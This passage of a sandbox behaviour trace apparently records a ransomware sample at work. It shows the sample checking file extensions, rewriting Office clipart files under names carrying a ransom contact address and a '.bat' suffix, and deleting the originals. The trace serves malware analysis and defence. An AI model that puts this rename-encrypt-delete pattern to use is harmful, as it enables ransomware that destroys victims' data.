Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 68 [0184.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 68 [0184.117] lstrlenW (lpString=".doc") returned 4 [0184.117] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.117] lstrlenW (lpString=".docx") returned 5 [0184.117] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.117] lstrlenW (lpString=".pdf") returned 4 [0184.117] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.117] lstrlenW (lpString=".xls") returned 4 [0184.117] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.118] lstrlenW (lpString=".xlsx") returned 5 [0184.118] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.118] lstrlenW (lpString=".ppt") returned 4 [0184.118] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 68 [0184.118] lstrlenW (lpString=".zip") returned 4 [0184.118] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.118] lstrlenW (lpString=".rar") returned 4 [0184.118] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.118] lstrlenW (lpString=".bz2") returned 4 [0184.118] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.118] lstrlenW (lpString=".7z") returned 3 [0184.118] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 68 [0184.118] lstrlenW (lpString=".dbf") returned 4 [0184.118] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 68 [0184.118] lstrlenW (lpString=".1cd") returned 4 [0184.118] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 68 [0184.118] lstrlenW (lpString=".jpg") returned 4 [0184.118] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.119] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.119] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0184.119] GetLastError () returned 0x0 [0184.119] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1338, lpOverlapped=0x0) returned 1 [0184.387] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1340, lpOverlapped=0x0) returned 1 [0184.388] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.388] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.388] SetEndOfFile (hFile=0x36c) returned 1 [0184.389] CloseHandle (hObject=0x36c) returned 1 [0184.389] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.389] SetEndOfFile (hFile=0x364) returned 1 [0184.390] CloseHandle (hObject=0x364) returned 1 [0184.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf")) returned 1 [0184.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 68 [0184.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 68 [0184.391] lstrlenW (lpString=".doc") returned 4 [0184.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.391] lstrlenW (lpString=".docx") returned 5 [0184.391] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.391] lstrlenW (lpString=".pdf") returned 4 [0184.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.391] lstrlenW (lpString=".xls") returned 4 [0184.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.391] lstrlenW (lpString=".xlsx") returned 5 [0184.391] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.391] lstrlenW (lpString=".ppt") returned 4 [0184.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 68 [0184.391] lstrlenW (lpString=".zip") returned 4 [0184.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.391] lstrlenW (lpString=".rar") returned 4 [0184.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.391] lstrlenW (lpString=".bz2") returned 4 [0184.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.392] lstrlenW (lpString=".7z") returned 3 [0184.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 68 [0184.392] lstrlenW (lpString=".dbf") returned 4 [0184.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 68 [0184.392] lstrlenW (lpString=".1cd") returned 4 [0184.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 68 [0184.392] lstrlenW (lpString=".jpg") returned 4 [0184.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.441] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.441] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0184.442] GetLastError () returned 0x0 [0184.442] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x22a0, lpOverlapped=0x0) returned 1 [0184.444] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x22b0, lpOverlapped=0x0) returned 1 [0184.445] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.445] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.445] SetEndOfFile (hFile=0x36c) returned 1 [0184.446] CloseHandle (hObject=0x36c) returned 1 [0184.446] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.446] SetEndOfFile (hFile=0x364) returned 1 [0184.447] CloseHandle (hObject=0x364) returned 1 [0184.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf")) returned 1 [0184.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 68 [0184.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 68 [0184.448] lstrlenW (lpString=".doc") returned 4 [0184.448] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.448] lstrlenW (lpString=".docx") returned 5 [0184.448] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.448] lstrlenW (lpString=".pdf") returned 4 [0184.448] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.448] lstrlenW (lpString=".xls") returned 4 [0184.448] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.448] lstrlenW (lpString=".xlsx") returned 5 [0184.448] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.448] lstrlenW (lpString=".ppt") returned 4 [0184.448] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 68 [0184.448] lstrlenW (lpString=".zip") returned 4 [0184.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.448] lstrlenW (lpString=".rar") returned 4 [0184.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.448] lstrlenW (lpString=".bz2") returned 4 [0184.448] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.448] lstrlenW (lpString=".7z") returned 3 [0184.448] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 68 [0184.468] lstrlenW (lpString=".dbf") returned 4 [0184.802] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 68 [0184.802] lstrlenW (lpString=".1cd") returned 4 [0184.802] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 68 [0184.802] lstrlenW (lpString=".jpg") returned 4 [0184.802] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.803] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.803] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0184.803] GetLastError () returned 0x0 [0184.803] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1ba0, lpOverlapped=0x0) returned 1 [0184.929] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1bb0, lpOverlapped=0x0) returned 1 [0184.932] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.932] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.932] SetEndOfFile (hFile=0x3a0) returned 1 [0184.933] CloseHandle (hObject=0x3a0) returned 1 [0184.933] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.933] SetEndOfFile (hFile=0x39c) returned 1 [0184.934] CloseHandle (hObject=0x39c) returned 1 [0184.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf")) returned 1 [0184.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 68 [0184.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 68 [0184.936] lstrlenW (lpString=".doc") returned 4 [0184.936] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.936] lstrlenW (lpString=".docx") returned 5 [0184.936] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.936] lstrlenW (lpString=".pdf") returned 4 [0184.936] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.936] lstrlenW (lpString=".xls") returned 4 [0184.936] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.936] lstrlenW (lpString=".xlsx") returned 5 [0184.936] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.936] lstrlenW (lpString=".ppt") returned 4 [0184.936] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 68 [0184.936] lstrlenW (lpString=".zip") returned 4 [0184.936] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.936] lstrlenW (lpString=".rar") returned 4 [0184.936] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.936] lstrlenW (lpString=".bz2") returned 4 [0184.936] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.936] lstrlenW (lpString=".7z") returned 3 [0184.936] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 68 [0184.936] lstrlenW (lpString=".dbf") returned 4 [0184.936] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 68 [0184.936] lstrlenW (lpString=".1cd") returned 4 [0184.936] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 68 [0184.937] lstrlenW (lpString=".jpg") returned 4 [0184.937] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.937] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.937] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0184.938] GetLastError () returned 0x0 [0184.938] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x121c, lpOverlapped=0x0) returned 1 [0184.975] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1220, lpOverlapped=0x0) returned 1 [0184.976] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.976] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.976] SetEndOfFile (hFile=0x3a0) returned 1 [0184.977] CloseHandle (hObject=0x3a0) returned 1 [0184.977] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.977] SetEndOfFile (hFile=0x39c) returned 1 [0184.978] CloseHandle (hObject=0x39c) returned 1 [0184.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf")) returned 1 [0184.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 68 [0184.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 68 [0184.979] lstrlenW (lpString=".doc") returned 4 [0184.979] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.979] lstrlenW (lpString=".docx") returned 5 [0184.979] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.979] lstrlenW (lpString=".pdf") returned 4 [0184.979] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.979] lstrlenW (lpString=".xls") returned 4 [0184.979] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.979] lstrlenW (lpString=".xlsx") returned 5 [0184.979] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.979] lstrlenW (lpString=".ppt") returned 4 [0184.979] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 68 [0184.979] lstrlenW (lpString=".zip") returned 4 [0184.979] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.979] lstrlenW (lpString=".rar") returned 4 [0184.979] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.979] lstrlenW (lpString=".bz2") returned 4 [0184.979] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.979] lstrlenW (lpString=".7z") returned 3 [0184.980] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 68 [0184.980] lstrlenW (lpString=".dbf") returned 4 [0184.980] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 68 [0184.980] lstrlenW (lpString=".1cd") returned 4 [0184.980] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 68 [0184.980] lstrlenW (lpString=".jpg") returned 4 [0184.980] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.980] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.981] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0184.981] GetLastError () returned 0x0 [0184.981] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1574, lpOverlapped=0x0) returned 1 [0185.003] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1580, lpOverlapped=0x0) returned 1 [0185.004] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.004] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.004] SetEndOfFile (hFile=0x3a0) returned 1 [0185.004] CloseHandle (hObject=0x3a0) returned 1 [0185.004] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.004] SetEndOfFile (hFile=0x39c) returned 1 [0185.005] CloseHandle (hObject=0x39c) returned 1 [0185.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf")) returned 1 [0185.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 68 [0185.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 68 [0185.006] lstrlenW (lpString=".doc") returned 4 [0185.006] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.006] lstrlenW (lpString=".docx") returned 5 [0185.006] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0185.007] lstrlenW (lpString=".pdf") returned 4 [0185.007] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.007] lstrlenW (lpString=".xls") returned 4 [0185.007] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.007] lstrlenW (lpString=".xlsx") returned 5 [0185.007] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0185.007] lstrlenW (lpString=".ppt") returned 4 [0185.007] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 68 [0185.007] lstrlenW (lpString=".zip") returned 4 [0185.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.007] lstrlenW (lpString=".rar") returned 4 [0185.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.007] lstrlenW (lpString=".bz2") returned 4 [0185.007] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.007] lstrlenW (lpString=".7z") returned 3 [0185.007] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 68 [0185.007] lstrlenW (lpString=".dbf") returned 4 [0185.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 68 [0185.007] lstrlenW (lpString=".1cd") returned 4 [0185.007] lstrcmpiW (lpString1=".1cd", 